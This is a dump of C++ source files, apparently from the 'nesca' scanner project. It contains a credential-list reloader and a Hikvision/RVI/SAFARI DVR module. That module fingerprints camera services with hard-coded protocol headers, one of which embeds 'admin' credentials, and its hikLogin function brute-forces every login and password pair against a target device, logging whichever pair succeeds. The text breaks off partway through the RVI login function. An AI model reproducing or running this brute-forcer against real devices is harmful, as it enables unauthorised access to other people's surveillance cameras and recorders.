0; 21 | int FileUpdater::gNegativeSize = 0; 22 | std::mutex FileUpdater::filesUpdatingMutex; 23 | std::condition_variable FileUpdater::cv; 24 | bool FileUpdater::ready = false; 25 | std::unique_lock FileUpdater::lk; 26 | std::vector FileUpdater::negativeVector; 27 | 28 | void negativeLoader() { 29 | std::ifstream file(NEGATIVE_FN); 30 | std::string line; 31 | 32 | while (std::getline(file, line)) FileUpdater::negativeVector.push_back(line); 33 | } 34 | 35 | void updateNegatives() { 36 | FileUpdater::negativeVector.clear(); 37 | negativeLoader(); 38 | } 39 | void updateLogin() { 40 | 41 | if(loginLst != NULL) 42 | { 43 | for(int i = 0; i < MaxLogin; ++i) delete []loginLst[i]; 44 | delete []loginLst; 45 | loginLst = NULL; 46 | }; 47 | 48 | MaxLogin = 0; 49 | 50 | char buffFG[32] = {0}; 51 | 52 | FILE *loginList = fopen(LOGIN_FN, "r"); 53 | 54 | if(loginList != NULL) 55 | { 56 | while(fgets(buffFG, 32, loginList) != NULL) 57 | { 58 | MaxLogin++; 59 | ZeroMemory(buffFG, sizeof(buffFG)); 60 | }; 61 | 62 | rewind(loginList); 63 | 64 | loginLst = new char*[MaxLogin]; 65 | 66 | for(int j = 0; j < MaxLogin; j++) 67 | { 68 | loginLst[j] = new char[32]; 69 | }; 70 | 71 | int i = 0; 72 | while(fgets(buffFG, 32, loginList) != NULL) 73 | { 74 | memset(loginLst[i], 0, strlen(buffFG) + 1); 75 | 76 | if(strstr(buffFG, "\n") != NULL) strncat(loginLst[i++], buffFG, strlen(buffFG) - 1); 77 | else strncat(loginLst[i++], buffFG, strlen(buffFG)); 78 | ZeroMemory(buffFG, sizeof(buffFG)); 79 | }; 80 | 81 | if(FileUpdater::oldLoginLstSize == 0) stt->doEmitionGreenFoundData("Login list loaded (" + QString::number(MaxLogin) + " entries)"); 82 | else stt->doEmitionFoundData("Login list updated (" + QString::number(MaxLogin) + " entries)"); 83 | 84 | fclose(loginList); 85 | } 86 | else 87 | { 88 | stt->doEmitionRedFoundData("No login list found"); 89 | stt->doEmitionKillSttThread(); 90 | }; 91 | } 92 | void updatePass() { 93 | 94 | if(passLst != NULL) 95 | { 96 | for(int i = 0; i < MaxPass; ++i) delete []passLst[i]; 97 | delete []passLst; 98 | passLst = NULL; 99 | }; 100 | 101 | MaxPass = 0; 102 | 103 | char buffFG[32] = {0}; 104 | 105 | FILE *passList = fopen(PASS_FN, "r"); 106 | 107 | if(passList != NULL) 108 | { 109 | while(fgets(buffFG, 32, passList) != NULL) 110 | { 111 | MaxPass++; 112 | ZeroMemory(buffFG, sizeof(buffFG)); 113 | }; 114 | 115 | rewind(passList); 116 | 117 | passLst = new char*[MaxPass]; 118 | 119 | for(int j = 0; j < MaxPass; j++) 120 | { 121 | passLst[j] = new char[32]; 122 | }; 123 | 124 | int i = 0; 125 | while(fgets(buffFG, 32, passList) != NULL) 126 | { 127 | memset(passLst[i], 0, strlen(buffFG) + 1); 128 | 129 | if(strstr(buffFG, "\n") != NULL) strncat(passLst[i++], buffFG, strlen(buffFG) - 1); 130 | else strncat(passLst[i++], buffFG, strlen(buffFG)); 131 | ZeroMemory(buffFG, sizeof(buffFG)); 132 | }; 133 | 134 | if(FileUpdater::oldPassLstSize == 0) stt->doEmitionGreenFoundData("Password list loaded (" + QString::number(MaxPass) + " entries)"); 135 | else stt->doEmitionFoundData("Password list updated (" + QString::number(MaxPass) + " entries)"); 136 | 137 | fclose(passList); 138 | } 139 | else 140 | { 141 | stt->doEmitionRedFoundData("No password list found"); 142 | stt->doEmitionKillSttThread(); 143 | }; 144 | } 145 | void updateSSH() { 146 | 147 | if(sshlpLst != NULL) 148 | { 149 | for(int i = 0; i < MaxSSHPass; ++i) delete []sshlpLst[i]; 150 | delete []sshlpLst; 151 | sshlpLst = NULL; 152 | }; 153 | 154 | MaxSSHPass = 0; 155 | 156 | char buffFG[32] = {0}; 157 | 158 | FILE *sshlpList = fopen(SSH_PASS_FN, "r"); 159 | 160 | if(sshlpList != NULL) 161 | { 162 | while(fgets(buffFG, 32, sshlpList) != NULL) 163 | { 164 | ++MaxSSHPass; 165 | ZeroMemory(buffFG, sizeof(buffFG)); 166 | buffFG[0] = 0; 167 | }; 168 | 169 | rewind(sshlpList); 170 | 171 | sshlpLst = new char*[MaxSSHPass]; 172 | 173 | for(int j = 0; j < MaxSSHPass; j++) 174 | { 175 | sshlpLst[j] = new char[32]; 176 | }; 177 | 178 | int i = 0; 179 | while(fgets(buffFG, 32, sshlpList) != NULL) 180 | { 181 | memset(sshlpLst[i], 0, strlen(buffFG) + 1); 182 | 183 | if(strstr(buffFG, "\n") != NULL) strncat(sshlpLst[i++], buffFG, strlen(buffFG) - 1); 184 | else strncat(sshlpLst[i++], buffFG, strlen(buffFG)); 185 | ZeroMemory(buffFG, sizeof(buffFG)); 186 | }; 187 | 188 | if(FileUpdater::oldSSHLstSize == 0) stt->doEmitionGreenFoundData("SSH Password list loaded (" + QString::number(MaxSSHPass) + " entries)"); 189 | else stt->doEmitionFoundData("SSH list updated (" + QString::number(MaxSSHPass) + " entries)"); 190 | 191 | fclose(sshlpList); 192 | } 193 | else 194 | { 195 | stt->doEmitionRedFoundData("No password/login list found"); 196 | stt->doEmitionKillSttThread(); 197 | }; 198 | } 199 | void updateWFLogin() { 200 | 201 | if(wfLoginLst != NULL) 202 | { 203 | for(int i = 0; i < MaxWFLogin; ++i) delete []wfLoginLst[i]; 204 | delete []wfLoginLst; 205 | wfLoginLst = NULL; 206 | }; 207 | 208 | MaxWFLogin = 0; 209 | 210 | char buffFG[32] = {0}; 211 | 212 | FILE *wfLoginList = fopen(WF_LOGIN_FN, "r"); 213 | 214 | if(wfLoginList != NULL) 215 | { 216 | while(fgets(buffFG, 32, wfLoginList) != NULL) 217 | { 218 | MaxWFLogin++; 219 | ZeroMemory(buffFG, sizeof(buffFG)); 220 | }; 221 | 222 | rewind(wfLoginList); 223 | 224 | wfLoginLst = new char*[MaxWFLogin]; 225 | 226 | for(int j = 0; j < MaxWFLogin; j++) 227 | { 228 | wfLoginLst[j] = new char[32]; 229 | }; 230 | 231 | int i = 0; 232 | while(fgets(buffFG, 32, wfLoginList) != NULL) 233 | { 234 | memset(wfLoginLst[i], 0, strlen(buffFG) + 1); 235 | 236 | if(strstr(buffFG, "\n") != NULL) strncat(wfLoginLst[i++], buffFG, strlen(buffFG) - 1); 237 | else strncat(wfLoginLst[i++], buffFG, strlen(buffFG)); 238 | ZeroMemory(buffFG, sizeof(buffFG)); 239 | }; 240 | 241 | if(FileUpdater::oldWFLoginLstSize == 0) stt->doEmitionGreenFoundData("WFLogin list loaded (" + QString::number(MaxWFLogin) + " entries)"); 242 | else stt->doEmitionFoundData("WFLogin list updated (" + QString::number(MaxWFLogin) + " entries)"); 243 | 244 | fclose(wfLoginList); 245 | } 246 | } 247 | void updateWFPass() { 248 | 249 | if(wfPassLst != NULL) 250 | { 251 | for(int i = 0; i < MaxWFPass; ++i) delete []wfPassLst[i]; 252 | delete []wfPassLst; 253 | wfPassLst = NULL; 254 | }; 255 | 256 | MaxWFPass = 0; 257 | 258 | char buffFG[32] = {0}; 259 | 260 | FILE *wfPassList = fopen(WF_PASS_FN, "r"); 261 | 262 | if(wfPassList != NULL) 263 | { 264 | while(fgets(buffFG, 32, wfPassList) != NULL) 265 | { 266 | MaxWFPass++; 267 | ZeroMemory(buffFG, sizeof(buffFG)); 268 | }; 269 | 270 | rewind(wfPassList); 271 | 272 | wfPassLst = new char*[MaxWFPass]; 273 | 274 | for(int j = 0; j < MaxWFPass; j++) 275 | { 276 | wfPassLst[j] = new char[32]; 277 | }; 278 | 279 | int i = 0; 280 | while(fgets(buffFG, 32, wfPassList) != NULL) 281 | { 282 | memset(wfPassLst[i], 0, strlen(buffFG) + 1); 283 | 284 | if(strstr(buffFG, "\n") != NULL) strncat(wfPassLst[i++], buffFG, strlen(buffFG) - 1); 285 | else strncat(wfPassLst[i++], buffFG, strlen(buffFG)); 286 | ZeroMemory(buffFG, sizeof(buffFG)); 287 | }; 288 | 289 | if(FileUpdater::oldWFPassLstSize == 0) stt->doEmitionGreenFoundData("WFPassword list loaded (" + QString::number(MaxWFPass) + " entries)"); 290 | else stt->doEmitionFoundData("WFPassword list updated (" + QString::number(MaxWFPass) + " entries)"); 291 | 292 | fclose(wfPassList); 293 | } 294 | } 295 | void updateFTPLogin() { 296 | 297 | if (ftpLoginLst != NULL) 298 | { 299 | for (int i = 0; i < MaxFTPLogin; ++i) delete[]ftpLoginLst[i]; 300 | delete[]ftpLoginLst; 301 | ftpLoginLst = NULL; 302 | }; 303 | 304 | MaxFTPLogin = 0; 305 | 306 | char buffFG[32] = { 0 }; 307 | 308 | FILE *ftpLoginList = fopen(FTP_LOGIN_FN, "r"); 309 | 310 | if (ftpLoginList != NULL) 311 | { 312 | while (fgets(buffFG, 32, ftpLoginList) != NULL) 313 | { 314 | MaxFTPLogin++; 315 | ZeroMemory(buffFG, sizeof(buffFG)); 316 | }; 317 | 318 | rewind(ftpLoginList); 319 | 320 | ftpLoginLst = new char*[MaxFTPLogin]; 321 | 322 | for (int j = 0; j < MaxFTPLogin; j++) 323 | { 324 | ftpLoginLst[j] = new char[32]; 325 | }; 326 | 327 | int i = 0; 328 | while (fgets(buffFG, 32, ftpLoginList) != NULL) 329 | { 330 | memset(ftpLoginLst[i], 0, strlen(buffFG) + 1); 331 | 332 | if (strstr(buffFG, "\n") != NULL) strncat(ftpLoginLst[i++], buffFG, strlen(buffFG) - 1); 333 | else strncat(ftpLoginLst[i++], buffFG, strlen(buffFG)); 334 | ZeroMemory(buffFG, sizeof(buffFG)); 335 | }; 336 | 337 | if (FileUpdater::oldFTPLoginLstSize == 0) stt->doEmitionGreenFoundData("FTP login list loaded (" + QString::number(MaxFTPLogin) + " entries)"); 338 | else stt->doEmitionFoundData("FTP login list updated (" + QString::number(MaxFTPLogin) + " entries)"); 339 | 340 | fclose(ftpLoginList); 341 | } 342 | } 343 | void updateFTPPass() { 344 | 345 | if (ftpPassLst != NULL) 346 | { 347 | for (int i = 0; i < MaxFTPPass; ++i) delete[]ftpPassLst[i]; 348 | delete[]ftpPassLst; 349 | ftpPassLst = NULL; 350 | }; 351 | 352 | MaxFTPPass = 0; 353 | 354 | char buffFG[32] = { 0 }; 355 | 356 | FILE *ftpPassList = fopen(FTP_PASS_FN, "r"); 357 | 358 | if (ftpPassList != NULL) 359 | { 360 | while (fgets(buffFG, 32, ftpPassList) != NULL) 361 | { 362 | ++MaxFTPPass; 363 | ZeroMemory(buffFG, sizeof(buffFG)); 364 | }; 365 | 366 | rewind(ftpPassList); 367 | 368 | ftpPassLst = new char*[MaxFTPPass]; 369 | 370 | for (int j = 0; j < MaxFTPPass; j++) 371 | { 372 | ftpPassLst[j] = new char[32]; 373 | }; 374 | 375 | int i = 0; 376 | while (fgets(buffFG, 32, ftpPassList) != NULL) 377 | { 378 | memset(ftpPassLst[i], 0, strlen(buffFG) + 1); 379 | 380 | if (strstr(buffFG, "\n") != NULL) strncat(ftpPassLst[i++], buffFG, strlen(buffFG) - 1); 381 | else strncat(ftpPassLst[i++], buffFG, strlen(buffFG)); 382 | ZeroMemory(buffFG, sizeof(buffFG)); 383 | }; 384 | 385 | if (FileUpdater::oldFTPPassLstSize == 0) stt->doEmitionGreenFoundData("FTP password list loaded (" + QString::number(MaxFTPPass) + " entries)"); 386 | else stt->doEmitionFoundData("FTP password list updated (" + QString::number(MaxFTPPass) + " entries)"); 387 | 388 | fclose(ftpPassList); 389 | } 390 | } 391 | long getFileSize(const char *fileName) { 392 | std::ifstream in(fileName, std::ifstream::ate | std::ifstream::binary); 393 | return in.tellg(); 394 | } 395 | 396 | void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) { 397 | if (!globalScanFlag) return; 398 | long sz = getFileSize(fileName); 399 | 400 | if(sz != *szPtr) { 401 | FileUpdater::lk = std::unique_lock (FileUpdater::filesUpdatingMutex); 402 | funcPtr(); 403 | *szPtr = sz; 404 | FileUpdater::lk.unlock(); 405 | FileUpdater::ready = true; 406 | FileUpdater::cv.notify_one(); 407 | } 408 | } 409 | 410 | void FileUpdater::updateLists() { 411 | running = true; 412 | while(globalScanFlag) { 413 | Sleep(30000); 414 | if(!globalScanFlag) break; 415 | loadOnce(); 416 | } 417 | running = false; 418 | } 419 | 420 | void FileUpdater::loadOnce() { 421 | updateList(NEGATIVE_FN, &oldNegLstSize, (void*(*)(void))updateNegatives); 422 | updateList(LOGIN_FN, &oldLoginLstSize, (void*(*)(void))updateLogin); 423 | updateList(PASS_FN, &oldPassLstSize, (void*(*)(void))updatePass); 424 | updateList(SSH_PASS_FN, &oldSSHLstSize, (void*(*)(void))updateSSH); 425 | updateList(WF_LOGIN_FN, &oldWFLoginLstSize, (void*(*)(void))updateWFLogin); 426 | updateList(WF_PASS_FN, &oldWFPassLstSize, (void*(*)(void))updateWFPass); 427 | updateList(FTP_LOGIN_FN, &oldFTPLoginLstSize, (void*(*)(void))updateFTPLogin); 428 | updateList(FTP_PASS_FN, &oldFTPPassLstSize, (void*(*)(void))updateFTPPass); 429 | } 430 | 431 | void FileUpdater::FUClear() { 432 | running = false; 433 | oldNegLstSize = 0; 434 | oldLoginLstSize = 0; 435 | oldPassLstSize = 0; 436 | oldSSHLstSize = 0; 437 | oldWFLoginLstSize = 0; 438 | oldWFPassLstSize = 0; 439 | oldFTPLoginLstSize = 0; 440 | oldFTPPassLstSize = 0; 441 | } 442 | -------------------------------------------------------------------------------- /FileUpdater.h: -------------------------------------------------------------------------------- 1 | #ifndef FILEUPDATER_H 2 | #define FILEUPDATER_H 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | class FileUpdater { 10 | public: 11 | static bool running; 12 | static long oldNegLstSize; 13 | static long oldLoginLstSize; 14 | static long oldPassLstSize; 15 | static long oldSSHLstSize; 16 | static long oldWFLoginLstSize; 17 | static long oldWFPassLstSize; 18 | static long oldFTPLoginLstSize; 19 | static long oldFTPPassLstSize; 20 | 21 | static bool ready; 22 | static std::condition_variable cv; 23 | static std::mutex filesUpdatingMutex; 24 | static std::unique_lock lk; 25 | static int gNegativeSize; 26 | static std::vector negativeVector; 27 | 28 | public: 29 | static void updateLists(); 30 | static void loadOnce(); 31 | static void FUClear(); 32 | }; 33 | 34 | #endif // FILEUPDATER_H 35 | -------------------------------------------------------------------------------- /HCNetSDK.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netstalking-core/nesca/469cdcb04cd1a7130a56974b1c85961b88b8eecc/HCNetSDK.lib -------------------------------------------------------------------------------- /HikvisionLogin.cpp: -------------------------------------------------------------------------------- 1 | #include "HikvisionLogin.h" 2 | #include "externData.h" 3 | #include "FileUpdater.h" 4 | 5 | bool HikVis::isInitialized = false; 6 | int HikVis::hikCounter = 0; 7 | int HikVis::hikPart = 0; 8 | int HikVis::rviCounter = 0; 9 | int HikVis::rviPart = 0; 10 | 11 | const char headerSAFARI[128] = { 12 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x52, 0x00, 0x00, 0x00, 0x7b, 0x22, 0x4d, 0x4f, 13 | 0x44, 0x55, 0x4c, 0x45, 0x22, 0x3a, 0x22, 0x43, 0x45, 0x52, 0x54, 0x49, 0x46, 0x49, 0x43, 0x41, 14 | 0x54, 0x45, 0x22, 0x2c, 0x22, 0x4f, 0x50, 0x45, 0x52, 0x41, 0x54, 0x49, 0x4f, 0x4e, 0x22, 0x3a, 15 | 0x22, 0x43, 0x4f, 0x4e, 0x4e, 0x45, 0x43, 0x54, 0x22, 0x2c, 0x22, 0x53, 0x45, 0x53, 0x53, 0x49, 16 | 0x4f, 0x4e, 0x22, 0x3a, 0x22, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x35, 0x2d, 0x36, 0x66, 17 | 0x37, 0x32, 0x2d, 0x34, 0x31, 0x63, 0x61, 0x2d, 0x39, 0x63, 0x37, 0x33, 0x2d, 0x62, 0x34, 0x37, 18 | 0x31, 0x33, 0x32, 0x36, 0x33, 0x65, 0x62, 0x36, 0x30, 0x22, 0x7d, 0x00 19 | }; 20 | 21 | const char headerIVMS[32] = { 22 | 0x00, 0x00, 0x00, 0x20, 0x63, 0x00, 0x00, 0x00, 23 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 24 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 25 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 26 | }; 27 | 28 | const char headerRVI[32] = { 29 | 0xa0, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x00, 30 | 0x61, 0x64, 0x6d, 0x69, 0x6e, 0x00, 0x00, 0x00, 31 | 0x61, 0x64, 0x6d, 0x69, 0x6e, 0x00, 0x00, 0x00, 32 | 0x04, 0x01, 0x00, 0x00, 0x00, 0x00, 0xa1, 0xaa 33 | }; 34 | 35 | const char loginRVIHeaderStart[8] = { 36 | 0xa0, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x00 37 | }; 38 | const char loginRVIHeaderEnd[8] = { 39 | 0x04, 0x01, 0x00, 0x00, 0x00, 0x00, 0xa1, 0xaa 40 | }; 41 | 42 | 43 | 44 | int recvWT( 45 | SOCKET socket, 46 | char *Buffer, 47 | int Len, 48 | long Timeout, 49 | int *bTimedOut 50 | ){ 51 | fd_set ReadSet; 52 | int n; 53 | struct timeval Time; 54 | FD_ZERO(&ReadSet); 55 | FD_SET(socket, &ReadSet); 56 | Time.tv_sec = Timeout; 57 | Time.tv_usec = 0; 58 | *bTimedOut = false; 59 | n = select(socket + 1, &ReadSet, NULL, NULL, &Time); 60 | if (n > 0) { /* got some data */ 61 | return recv(socket, Buffer, Len, 0); 62 | } 63 | if (n == 0) { /* timeout */ 64 | *bTimedOut = true; 65 | } 66 | return(n); /* trouble */ 67 | } 68 | 69 | 70 | bool HikVis::checkHikk(const char * sDVRIP, int port) { 71 | sockaddr_in sa; 72 | sa.sin_family = AF_INET; 73 | sa.sin_port = htons(port); 74 | 75 | hostent *host = NULL; 76 | #if defined(WIN32) 77 | if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.S_un.S_addr = inet_addr(sDVRIP); 78 | else if (host = gethostbyname(sDVRIP)) ((unsigned long*)&sa.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; 79 | #else 80 | if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.s_addr = inet_addr(sDVRIP); 81 | else if (host = gethostbyname(sDVRIP)) ((unsigned long*)&sa.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; 82 | #endif 83 | else { 84 | if (gNegDebugMode) 85 | { 86 | stt->doEmitionDebugFoundData("inet_addr error - iVMS check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 88 | } 89 | return false; 90 | } 91 | 92 | SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 93 | if (sock == INVALID_SOCKET) { 94 | if (gNegDebugMode) 95 | { 96 | stt->doEmitionDebugFoundData("Socket error - iVMS check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 98 | } 99 | return false; 100 | } 101 | 102 | struct linger linger = { 1, gTimeOut }; 103 | setsockopt(sock, SOL_SOCKET, SO_LINGER, (const char *)&linger, sizeof(linger)); 104 | 105 | int res = connect(sock, (sockaddr*)&sa, sizeof(sa)); 106 | int bTO; 107 | char buff[2048] = { 0 }; 108 | if (res != SOCKET_ERROR) { 109 | send(sock, headerIVMS, 32, 0); 110 | char tBuff[32] = { 0 }; 111 | int offset = 0; 112 | int sz = 0; 113 | int bsz = 0; 114 | while ((sz = recvWT(sock, tBuff, 16, gTimeOut, &bTO)) > 0) { 115 | memcpy(buff + offset, tBuff, sz); 116 | offset = sz; 117 | bsz += sz; 118 | } 119 | 120 | shutdown(sock, SD_BOTH); 121 | closesocket(sock); 122 | 123 | if (bsz == 0) { 124 | if (gNegDebugMode) 125 | { 126 | stt->doEmitionDebugFoundData("iVMS check failed - size = 0, code = (" + QString::number(sz) + ") [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 128 | } 129 | return false; 130 | } 131 | else { 132 | if (buff[3] == 0x10) { 133 | if (gNegDebugMode) 134 | { 135 | stt->doEmitionDebugFoundData("iVMS check succeeded [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 137 | } 138 | return true; 139 | } 140 | else { 141 | if (gNegDebugMode) 142 | { 143 | stt->doEmitionDebugFoundData("iVMS check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 145 | } 146 | return false; 147 | } 148 | } 149 | } 150 | 151 | shutdown(sock, SD_BOTH); 152 | closesocket(sock); 153 | if (gNegDebugMode) 154 | { 155 | stt->doEmitionDebugFoundData("Unknown error - iVMS check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 157 | } 158 | return false; 159 | } 160 | 161 | bool HikVis::checkRVI(const char * sDVRIP, int port) { 162 | sockaddr_in sa; 163 | sa.sin_family = AF_INET; 164 | sa.sin_port = htons(port); 165 | 166 | hostent *host = NULL; 167 | #if defined(WIN32) 168 | if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.S_un.S_addr = inet_addr(sDVRIP); 169 | else if (host = gethostbyname(sDVRIP)) ((unsigned long*)&sa.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; 170 | #else 171 | if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.s_addr = inet_addr(sDVRIP); 172 | else if (host = gethostbyname(sDVRIP)) ((unsigned long*)&sa.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; 173 | #endif 174 | else { 175 | if (gNegDebugMode) 176 | { 177 | stt->doEmitionDebugFoundData("inet_addr error - RVI check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 179 | } 180 | return false; 181 | } 182 | 183 | SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 184 | if (sock == INVALID_SOCKET) { 185 | if (gNegDebugMode) 186 | { 187 | stt->doEmitionDebugFoundData("Socket error - RVI check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 189 | } 190 | return false; 191 | } 192 | 193 | struct linger linger = { 1, gTimeOut }; 194 | setsockopt(sock, SOL_SOCKET, SO_LINGER, (const char *)&linger, sizeof(linger)); 195 | 196 | int res = connect(sock, (sockaddr*)&sa, sizeof(sa)); 197 | int bTO; 198 | char buff[2048] = { 0 }; 199 | if (res != SOCKET_ERROR) { 200 | send(sock, headerRVI, 32, 0); 201 | char tBuff[32] = { 0 }; 202 | int offset = 0; 203 | int sz = 0; 204 | int bsz = 0; 205 | while ((sz = recvWT(sock, tBuff, 16, gTimeOut, &bTO)) > 0) { 206 | memcpy(buff + offset, tBuff, sz); 207 | offset = sz; 208 | bsz += sz; 209 | } 210 | 211 | shutdown(sock, SD_BOTH); 212 | closesocket(sock); 213 | if (bsz == 0) { 214 | if (gNegDebugMode) 215 | { 216 | stt->doEmitionDebugFoundData("RVI check failed - size = 0, code = (" + QString::number(sz) + ") [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 218 | } 219 | return false; 220 | } 221 | else { 222 | if (buff[0] == -80) { 223 | if (gNegDebugMode) 224 | { 225 | stt->doEmitionDebugFoundData("RVI check succeeded [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 227 | } 228 | return true; 229 | } 230 | else { 231 | if (gNegDebugMode) 232 | { 233 | stt->doEmitionDebugFoundData("RVI check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 235 | stt->doEmitionDebugFoundData("Buffer: " + QString(buff).toLocal8Bit().toHex()); 236 | } 237 | return false; 238 | } 239 | } 240 | } 241 | 242 | shutdown(sock, SD_BOTH); 243 | closesocket(sock); 244 | if (gNegDebugMode) 245 | { 246 | stt->doEmitionDebugFoundData("Unknown error - RVI check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 248 | } 249 | return false; 250 | } 251 | 252 | bool HikVis::checkSAFARI(const char * sDVRIP, int port) { 253 | sockaddr_in sa; 254 | sa.sin_family = AF_INET; 255 | sa.sin_port = htons(port); 256 | 257 | hostent *host = NULL; 258 | #if defined(WIN32) 259 | if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.S_un.S_addr = inet_addr(sDVRIP); 260 | else if (host = gethostbyname(sDVRIP)) ((unsigned long*)&sa.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; 261 | #else 262 | if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.s_addr = inet_addr(sDVRIP); 263 | else if (host = gethostbyname(sDVRIP)) ((unsigned long*)&sa.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; 264 | #endif 265 | else { 266 | if (gNegDebugMode) 267 | { 268 | stt->doEmitionDebugFoundData("inet_addr error - SAFARI check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 270 | } 271 | return false; 272 | } 273 | 274 | SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 275 | if (sock == INVALID_SOCKET) { 276 | if (gNegDebugMode) 277 | { 278 | stt->doEmitionDebugFoundData("Socket error - SAFARI check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 280 | } 281 | return false; 282 | } 283 | 284 | struct linger linger = { 1, gTimeOut }; 285 | setsockopt(sock, SOL_SOCKET, SO_LINGER, (const char *)&linger, sizeof(linger)); 286 | 287 | int res = connect(sock, (sockaddr*)&sa, sizeof(sa)); 288 | int bTO; 289 | char buff[2048] = { 0 }; 290 | if (res != SOCKET_ERROR) { 291 | send(sock, headerSAFARI, 128, 0); 292 | char tBuff[128] = { 0 }; 293 | int offset = 0; 294 | int sz = 0; 295 | int bsz = 0; 296 | while ((sz = recvWT(sock, tBuff, 128, gTimeOut, &bTO)) > 0) { 297 | memcpy(buff + offset, tBuff, sz); 298 | offset = sz; 299 | bsz += sz; 300 | } 301 | 302 | shutdown(sock, SD_BOTH); 303 | closesocket(sock); 304 | 305 | if (bsz == 0) { 306 | if (gNegDebugMode) 307 | { 308 | stt->doEmitionDebugFoundData("SAFARI check failed - size = 0, code = (" + QString::number(sz) + ") [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 310 | } 311 | return false; 312 | } 313 | else { 314 | if (buff[0] != '\0') { 315 | if (gNegDebugMode) 316 | { 317 | stt->doEmitionDebugFoundData("SAFARI check succeeded [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 319 | } 320 | return true; 321 | } 322 | 323 | if (buff[0] == 8) { 324 | if (gNegDebugMode) 325 | { 326 | stt->doEmitionDebugFoundData("SAFARI check succeeded [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 328 | } 329 | return true; 330 | } 331 | else { 332 | if (gNegDebugMode) 333 | { 334 | stt->doEmitionDebugFoundData("SAFARI check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 336 | } 337 | return false; 338 | } 339 | } 340 | } 341 | 342 | shutdown(sock, SD_BOTH); 343 | closesocket(sock); 344 | if (gNegDebugMode) 345 | { 346 | stt->doEmitionDebugFoundData("Unknown error - SAFARI check failed [" + QString(sDVRIP) + ":" + QString::number(port) + "]"); 348 | } 349 | return false; 350 | } 351 | 352 | #include "Utils.h" 353 | lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort) 354 | { 355 | lopaStr lps = { "UNKNOWN", "", "" }; 356 | int passCounter = 0; 357 | char ip[64] = { 0 }; 358 | strcpy(ip, sDVRIP); 359 | int rowIndex = -1; 360 | 361 | char login[32] = { 0 }; 362 | char pass[32] = { 0 }; 363 | 364 | for (int i = 0; i < MaxLogin; ++i) { 365 | FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); 366 | strcpy(login, loginLst[i]); 367 | for (int j = 0; j < MaxPass; ++j) { 368 | FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; }); 369 | if (!globalScanFlag) return lps; 370 | strcpy(pass, passLst[j]); 371 | 372 | NET_DVR_DEVICEINFO_V30 *info = 0; 373 | hik_init_ptr(); 374 | int res = hik_login_ptr(ip, wDVRPort, login, pass, info); 375 | hik_cleanup_ptr(); 376 | if (res == 0) { 377 | strcpy(lps.login, login); 378 | strcpy(lps.pass, pass); 379 | 380 | rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex); 381 | 382 | return lps; 383 | } 384 | 385 | rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); 386 | 387 | ++passCounter; 388 | Sleep(200); 389 | } 390 | } 391 | 392 | rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex); 393 | 394 | return lps; 395 | } 396 | 397 | int rvi_login_ptr(const char *sDVRIP, int wDVRPort, const char *login, const char *pass) { 398 | sockaddr_in sa; 399 | sa.sin_family = AF_INET; 400 | sa.sin_port = htons(wDVRPort); 401 | 402 | hostent *host = NULL; 403 | #if defined(WIN32) 404 | if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.S_un.S_addr = inet_addr(sDVRIP); 405 | else if (host = gethostbyname(sDVRIP)) ((unsigned long*)&sa.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; 406 | #else 407 | if (inet_addr(sDVRIP) != INADDR_NONE) sa.sin_addr.s_addr = inet_addr(sDVRIP); 408 | else if (host = gethostbyname(sDVRIP)) ((unsigned 